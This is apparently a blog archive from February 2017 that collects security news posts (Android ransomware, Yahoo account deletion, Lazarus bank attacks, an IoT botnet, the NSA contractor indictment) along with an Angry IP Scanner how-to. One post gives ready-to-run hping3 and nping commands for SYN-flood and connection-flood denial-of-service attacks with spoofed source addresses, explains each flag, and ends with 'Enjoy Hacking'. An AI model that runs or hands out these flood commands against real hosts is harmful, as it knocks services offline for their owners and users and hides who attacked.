Monthly Archives: February 2017

Android ransomware attacks have grown by 50 percent

Ransomware targeting Android users has increased by over 50 percent in just a year, as cybercriminals increasingly take aim at what they view as an easy ecosystem to penetrate.

This, the highest number of attempts to infect Android smartphones and tablets with malicious file-encrypting software so far, comes as users increasingly turn to mobiles as their primary devices, storing more and more valuable data on them.

According to cybersecurity researchers at ESET, the biggest spike in ransomware attacks came in first half of 2016. And because ransomware was then a relatively new attack vector — at least when it came to targeting businesses — means many fell foul of it.

android-ransomware-detection-1024x631.png
Ransomware detection from 2014 to 2016.

Image: ESET

Eastern Europe was initially the main target of ransomware distributors but this has changed, with figures in ESET’s Trends in Android Ransomware paper suggesting that now 72 percent of successful ransomware attacks distributing Lockerpin ransomware target users in the United States.

The reason for the shift in targeting, as with most other cybercriminal decision making, comes down to money. Mobile users in the US are richer than those in Eastern Europe, so distributors of ransomware can make more money by targeting them.

Lockerpin is a particularly aggressive form of Android ransomware, which has continually evolved since it was first discovered in August 2015. Typically spread via malicious, fake applications, Lockerpin claims to be the FBI, accusing the victim of harbouring illegal content and demanding a $500 ransom.

While there are some forms of Android ransomware which have been a thorn in the side of users for well over a year, malicious developers aren’t just content to sit back on their laurels, with new forms of malware appearing all the time.

One of the newest forms of Android ransomware is Charger, a nasty form of mobile ransomware which steals data from its victims.

The zero-day mobile ransomware was found embedded in an app supposedly designed to enhance battery-life of phones and tablets — and downloaded directly from the Google Play. Google has since removed the ransomware from its store.

In order to avoid falling victim to Android ransomware threats, ESET researchers recommend that users avoid unofficial app stores and keep mobile security software up-to-date.

It’s also recommended that users keep regular backups of data, so in the worst case scenario of falling victim to a ransomware attack, data can easily be retrieved without handing money to criminals.

Deleting your Yahoo email account? Yeah, good luck with that

Deleted your Yahoo account? Think again.

Several Yahoo users, who last year decided to leave the service, told us that their accounts remained open for weeks or months after the company said they would be closed.

News broke in September of a massive state-sponsored cyberattack that led to the theft of 500 million records — then thought to be the largest theft of records in history. That alone was enough for some to take action and delete their accounts, months before the company admitted it was hacked again — this time taking one billion accounts.

David Clarke was one of those departing users, whose dormant account was slowly accumulating junk over the past few years.

“This was an ancient email I had set up, had no personal data in it anymore and had a unique password,” writing about his troubles on Medium. “But it’s a part of my digital footprint that I no longer required and decided, given the horrible security practices going on at Yahoo, to vote with my account and have it removed.”

Yahoo makes the account deletion process straightforward enough, but users have to wait “in most cases… approximately 90 days” for the account to close. The company says this is to “discourage users from engaging in fraudulent activity.”

On day 91, Clarke logged back into his account to find that it was still active. Unbeknownst to him, logging back in simply to check would reset the clock back to zero.

“Yahoo confirmed via email yesterday if you access your account it resets the timer,” he told me. “So, if you login to ensure your account has been deleted and it hasn’t, you have to wait at least another 90 days.”

Clarke may have checked down to the day, but others we spoke to said that their accounts were still active for months longer — even though they hadn’t logged back in.

One user told me that they deleted their account “the day the breach was announced” in late September. But, as of the end of January, he was still receiving messages that were automatically forwarded from his Yahoo inbox.

He told me that he hadn’t logged in to his account because he continues “to receive Yahoo-originated mailing list mail,” he said. “This implies that the Yahoo account has not been deleted,” he added.

When we asked him to confirm his account was still active, he told me that his email address was accepted at the login screen.

Users with expired or deleted accounts would see an error message saying that their accounts are “not recognized.”

Another user told me that they thought their account was “supposedly terminated” days after news of the hack broke, but confirmed his account was still active — when it should have closed by December.

“Since around August, I had a handful of attempted logins from South Korea and India — maybe five or 10 of them, he said. “Yahoo appeared to shut out most of them,” he added. “This account had essentially nothing in it — I think a decade-old Flickr account is the only reason I had it — so I wasn’t using two-factor authentication or paying much attention to it at all.”

“According to [Yahoo], my account should have been deleted by the end of December — but I received yet another ‘unexpected sign-in attempt’ email (from South Korea, as usual) on Feb. 1,” he said.

A delay in closing the account coupled with an unauthorized sign-in may be why the account has not closed.

“Why aren’t they at least putting the account into some kind of suspension mode?” the user told me.

A third user told me that that they had also deleted their account around the time of the September breach, but he had not logged in since. He confirmed that his account was still active.

However, another two other people confirmed that their accounts, marked for deactivation and deletion earlier in the year, had been successfully deleted and were unable to log in.

It’s not known how widespread the problem is or how many are affected.

The company has faced its fair share of bad security headlines — not only was it hacked on three occasions (in caseyou count Tumblr), but it’s also faced privacy issues and run-ins over national security, which led to an internal clash that resulted in the company’s chief security officer resigning.

A Yahoo spokesperson did not comment, but did point to the company’s privacy policy, which says: “Any information that we have copied may remain in back-up storage for some period of time after your deletion request. This may be the case even though no account information remains in our active user databases.”

Angry IP Scanner – How to Use and Download

What is Angry IP Scanner?

Angry IP Scanner is a simple fast and effective portable program to scan and manage IP details and configurations. It is a free program and you can easily use and download this program from the sourceforge website.

Supported Operating System

  • Windows XP
  • Windows VISTA
  • Windows 7
  • Windows 8
  • Windows 10
  • Mac OS X
  • Linux
  • UBUNTU

Will work with previous version of Windows but support is very limited.

Is this a virus?

No, it is not a virus. It is simple network program designed for System Admin and Network professionals. Some antivirus might show some warning for this program which is a false positive alarm. Ignore it or add to allow list.

Features :

Some of the brilliant features of Angry IP Scanner program are –
  1. Small and Efficient
  2. Fast port scanner
  3. Reverse look up IP address
  4. Mac  Address Look up
  5. Complete IP range support from 1.0.0.1 to 255.255.255.255
  6. Automatic OS detection
  7. No Adware Malware or Advertisement pop ups.
  8. Additional Network Configuration Tools

How to Use Angry IP Scanner Tutorial

If you are a home user with a single computer you have nothing much to do with this tool apart from scanning your ISP and detecting open ports on the connected network range. Make sure you do not break any of your country law as some countries block the use of IP scans.
Network Admin will love this tool for what it is capable of achieving in a few seconds (depending upon the IP block range you are exploring). These are some of the important things which can help you out with your Network management –

Scan for Open ports

  1. Specify the IP range of your network
  2. Enter Hostname
  3. Select Netmask from the drop down
  4. Press the start button
  5. Wait till complete scan is completed
Now the ones in Red are dead connections and the blue dots are live systems. By default you will shown the Ping time, hostname and Ports associated with the particular IP address.

Look up Mac Address

  1. Follow the same steps as mentioned above
  2. Right click any IP you want to know Mac address
  3. Select Show details
  4. You will now be shown Mac address and other details
  5. Select IP address you want to check for open ports
  6. Right click it and select scan all ports
  7. Get the complete list in a few seconds

Search for All open ports

There are many additional tasks that you can do with this open source program. You can join the Discussion here.

Download Angry IP Scanner

You use the following links to download this program to your computer –
If you are facing any problem using this program you can ask for help in the comment section. Use this program responsibly.

New wave of cyberattacks against global banks linked to Lazarus cybercrime group

An aggressive campaign of malware attacks against dozens of banks across the globe has been linked to the notorious cybercriminal group known as Lazarus.

The hacking gang, active since 2009, has been involved in a number of aggressive cyberattacks against financial institutions, including the theft of $81m from the Bangladesh Bank’s US Federal Reserve.

 

Now the group continues to be a thorn in the side of organisations across the globe as banks in 31 countries have been targeted in a new wave of attacks by Lazarus that began in October last year.

This latest wave of attacks came to light when a Polish bank discovered previously unknown malware on its network and shared indicators of compromise with other institutions, a number of which also found they’d fallen victim to the malware.

The source of the attack is suspected to have been the website of the Polish financial regulator, which was compromised by hackers who used a watering hole attack to redirect visitors to an exploit kit. This exploit kit infected specific targets with malware that’s instructed to only infect visitors from around 150 different IP addresses.

While these are mostly banks, a small number of telecommunications and internet firms have also been targeted by this malware scheme, which takes aim at 104 organisations in 31 countries. Banks in Poland and the United States are most targeted by Lazarus in this attack, which also hit a number of banks in Central and South America.

Big Issue – How your fingerprint could actually make your iPhone less secure

Fingerprints and thumbprints might be convenient, but they can be used against you.

When Apple introduced its fingerprint reader to the iPhone, the company thought it would help keep your data more secure.

But the problem is that feds have figured out that if it legally wants access to your iPhone’s data, it can’t force you to turn over your passcode, though it can force you to unlock it with your fingerprint.

It’s a rare instance that the law has moved faster than the tech in your pocket. US authoritiesfigured out that your fingerprint is not subject to the Fifth Amendment, which protects the right to silence and prevents self-incrimination.

In other words, it protects what’s stored in your head, but not what’s at on your finger tips.

It’s still up for discussion in the courts, but if you have vital secrets on your iPhone or work in an industry or space where you risk interactions with the law, such as peaceful protests, activism, or journalism, you may want to turn off Touch ID on your lock screen.

 

Disabling your fingerprint on the lock screen takes less than a minute. Here‘s how.

1. Go to the Settings on your iPhone.

2. Go to Touch ID & Passcode.

3. Enter your lock screen passcode.

4. At the top of the screen, make sure iPhone Unlock is set to off.

5. You may also strengthen your passcode requirement by scrolling down and changing theRequire Passcode to Immediately.

There’s no harm in using your fingerprint for Apple Pay or the iTunes or App Store. But ensuring that the lock screen is a passcode only further protects your data

Amazingly How IoT hackers turned a university’s network against itself

A university found its own network turned against it – as refrigerators and lights overwhelmed it with searches for seafood.

Hackers are increasingly building botnets out of unsecured Internet of Things devices and using them to direct traffic at particular targets in order to overwhelm servers with the aim of taking websites and services offline.

The hijacked devices are used to target networks which could be anywhere across the globe, but cybersecurity researchers have now detailed how a network of hacked IoT devices were turned around to attack the very network they were hosted on.

The case in question, as reported in Verizon’s Data Breach Digest 2017, occurred within the last year and involved the computer network at an unspecified university.

Analysis of the university firewall identified over 5,000 devices making hundreds of Domain Name Service (DNS) look-ups every 15 minutes, slowing the institution’s entire network and restricting access to the majority of internet services.

In this instance, all of the DNS requests were attempting to look up seafood restaurants — and it wasn’t because thousands of students all had an overwhelming urge to eat fish — but because devices on the network had been instructed to repeatedly carry out this request.

“We identified that this was coming from their IoT network, their vending machines and their light sensors were actually looking for seafood domains; 5,000 discreet systems and they were nearly all in the IoT infrastructure,” says Laurance Dine, managing principal of investigative response at Verizon.

There’s no indication as to why hackers chose seafood restaurant searches as the tool of choice to overwhelm the servers.

Exploiting the poor security of Internet of Things by using brute force attacks to crack default and poor passwords, cybercriminals hacked into the network of IoT devices and deployed malware.

This malware instructed the likes of lights and fridges to turn their requests against the university in order to overwhelm the network in one of the first recorded attacks of its kind.

“It’s a very interesting concept of what the future may hold. Because the difference between what this is doing and other scenarios is [it’s] using your own IoT against you,” says Dine.

“They’re not using IoT or a combination of IoT networks from around the globe to target somebody in a botnet DDoS attack. This is actually the university’s own IoT network pitted against the university”.

This attack ultimately aimed to take down the network of the entire university, which would’ve succeeded if cybersecurity professionals hadn’t been able to remedy the attack.

While this incident represents one of the first of its kind, the bad news is this form of attack is only going to become more common as more and more everyday items get connected to the internet, providing hackers with greater numbers of potential zombie devices.

“The reason behind it is the issue of default credentials for wireless devices. This is going to bring billions of devices into the fold by 2020, which is only three years away. Whenever it is, there’s going to be so many of these things used by people with very limited understanding of what they are,” says Dine.

“There’s people who don’t have laptops that are going to have refrigerators that are going to be on a network that can communicate with whatever. They’re not going to know about changing default passwords,” he adds.

One way organisations can attempt to avoid falling victim to this sort of attack is by ensuring that IoT devices are on a completely different network to the rest of the IT estate.

But until IoT manufacturers bother to properly secure their devices — and the organisations which deploy them learn to properly manage them — DDoS attacks by IoT botnets are going to remain a huge threat.

Why White House cybersecurity staff shakedup ???

The Obama-appointed chief information security officer was charged with keeping the president and his staff safe from cyber-threats posed by hackers and nation-state attackers.

 

The chief information security officer for the White House’s Executive Office of the President has been removed from his position, sources have confirmed.

Cory Louie was appointed to the position by former President Obama in 2015, charged with keeping safe the staff closest to the president — including the president himself — from cyber-threats posed by hackers and nation-state attackers.

But circumstances surrounding his departure, weeks after President Donald Trump took office, remain unclear.

It’s thought he was either fired or asked to resign last Thursday evening, and he was escorted out from his office in the Eisenhower Executive Office Building across the street from the West Wing.

His LinkedIn profile remains unchanged at the time of writing.

Since then, there has been a near-absolute wall of silence from the White House — from both the staff, which up until last week worked for Louie, and spokespeople for the Trump administration.

However, one source said it’s because the remaining staff have “targets on their back” and are afraid of speaking out, calling the actions a “witch hunt” for former Obama appointees. Accusations of poor management were said to be reasons or excuses for his forced departure amid what was described as a “toxic” working environment.

Several messages to Louie throughout the week went unreturned.

A spokesperson for the White House did not return multiple requests for comment by phone and email.

 

News of the departure was first reported by Steve Clemons, an editor for The Atlantic, but could not be immediately confirmed. It was initially thought that senior Secret Service staff were dismissed, but this was quickly refuted by a spokesperson.

After holding various security positions at Dropbox and Google, Louie joined the White House as part of former President Obama’s cybersecurity national action plan, which created a federal chief information security officer (CISO) position to oversee the government’s internal cybersecurity strategy.

The White House CISO is charged with the security of all White House internal networks, communications, device, and data security.

While specifics of the role aren’t known, a memo written by Louie and circulated among White House staff gave insight into the work he did. The memo, later leaked, gave technology guidance and security advice on use of devices and communications during Obama’s visit to Cuba in March last year.

Louie remained on after the transition of power to the Trump administration, while a number of other key senior staff vacated their positions.

Meanwhile, Trump was given a new smartphone, a similar lock-down device that his predecessor had, but reportedly also uses his old, outdated Samsung Galaxy phone to tweet — stirring frustration and mockery alike from security experts.

Former senior IT and cybersecurity staff, including former Federal CISO Gregory Touhill, former Federal Chief Information Officer Tony Scott, and former White House IT Director David Recordon, all resigned their positions when Obama left office.

It’s not known if Louie’s vacated position was immediately filled.

Awesome Hacking Month – What’s Upcoming This Month In Prohacker

We Would Like To Acknowledge Users About Upcoming Tutorials This Month In Prohacker Application

Right Now We Are Preparing For New Tutorials With Practical Approaches They Are Listed Below :

  1. Automatic SQL injection and database tools
  2. Database Honeypots
  3. Malware collector
  4. Metasploit
  5. Kali Linux Nmap
  6. More Than 5 New Tools And Techniqes For Hacking
  7. And More ….. Including Daily Hacking News And Security Vulnerabilities

Guys Stay Updated From Prohacker For Upcoming Awesome Tutorials This Month

Rate 5 Star And Review Us On Google Play If You Like This Tutorials And Our Work – We Love To Get Appericiated

 

 

Practical Approach For – DoS attacks using hping3 / nping

Wiki about DoS attacks explanation: Denial of-Service Attack

DDoS attacks are common attacks, occurring about 28 times per hour. http://www.digitalattackmap.com provide worldwide distribution of DDoS attacks in real time:

From the map of the DDoS attack, the international situation can be seen; for example, the Japanese-Chinese attack can be seen on September 18; after Trump announced the wall, you can see the Mexican-American attack.

 

DoS attacks using hping3:

#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com

 

  • -c: the number of packets sent
  • -d: Size of each packet
  • -S: Sends SYN packets
  • -w: TCP window size
  • -p: target port, you can specify any port
  • -flood: Send packets as fast as possible
  • -rand-source: Use a random IP address, the target machine to see a pile of ip, you can not locate the actual IP; You can also use-a or -spoof hide the host name

Simple SYN flood attack:

# hping3 -S –flood -V testsite.com

TCP connection attack:

# nping –tcp-connect -rate=90000 -c 900000 -q testsite.com

For more information on these two tools:

# man hping3# man nping

 

Please Feel Free To Share Your Views Experience Or Issue In Comments Below “Spam Comments Are Strictly Prohibited” Now we have better comment systems and servers

 

If You Like This Application Please Give Your Valuable Review In Google Play Store.

 

Enjoy Hacking !!!!!

 

 

Former NSA contractor indicted over 50TB gov’t classified data theft

  • A former US National Security Agency (NSA) contractor has been indicted over an alleged 20-year campaign to steal classified government documents.
  • On Wednesday, a federal grand jury indicted Harold Thomas Martin III for what prosecutors say “may have been the largest heist of classified government information in history,” as reported by Reuters.
  • Reports suggest that the alleged theft may have also included the majority of the NSA’s elite hacking unit’s extensive library of hacking tools and software.
  • The 52-year-old allegedly collected data from the US intelligence agency relating to national defense from December 1993 to August 2016.
  • According to Acting Assistant Attorney General for National Security Mary McCord, US Attorney Rod Rosenstein for the District of Maryland and Special Agent Gordon Johnson of the FBI’s Baltimore Field Office, Martin was employed by at least seven different private companies during this time and was granted work as a contractor for various government agencies.
  • The contractor held security clearances up to Top Secret and Sensitive Compartmented Information (SCI) during some of this time period, and according to prosecutors, “worked on a number of highly classified, specialized projects where he had access to government computer systems, programs and information, including classified information.”
  • Over the course of over two decades, Martin allegedly stole sensitive information which was then hoarded at his home in Glen Burnie, Maryland.
  • The Washington Post reported earlier this week that the stolen data included NSA hacking tools, operational plans against a “known enemy” of the US, and a total of 50 terabytes of digital, classified material.
  • According to the publication, Martin once held a position in the NSA’s top hacker unit, Tailored Access Operations (TAO), and managed to make off with over 75 percent of the department’s library of hacking tools.
  • If the allegation proves to be true, TAO’s library and hacking toolset not only would fetch a very high price on the market due to the unit’s focus on cyberespionage, but the theft highlights a gross security breach in what should be a secretive and secure department.
  • It is not currently known whether any of the alleged stolen data was utilized for nefarious purposes, sold, or leaked. 
  • When Martin was taken into custody last August, he was working for Booz Allen Hamilton, a government contractor which also provided former NSA contractor Edward Snowden to the intelligence agency.
  • In 2013, Snowden leaked a treasure trove of confidential government documents to the media which exposed the mass surveillance activities of the US agency both in its home country and abroad, prompting outrage from technology vendors and the general public.
  • Martin’s indictment means he faces a total of 20 criminal counts, each of which can earn the former contractor up to 10 years in prison under the Espionage Act, according to the Department of Justice (DoJ).
  • “The FBI investigation and this indictment reveal a broken trust from a security clearance holder,” said Johnson. “Willfully retaining highly classified national defense information in a vulnerable setting is a violation of the security policy and the law, which weakens our national security and cannot be tolerated.”
  • The former contractor is reportedly considered a flight risk — perhaps as an echo of Snowden’s dash to Russia — and remains at a detention facility until a hearing on February 14 at the US District Court in Baltimore.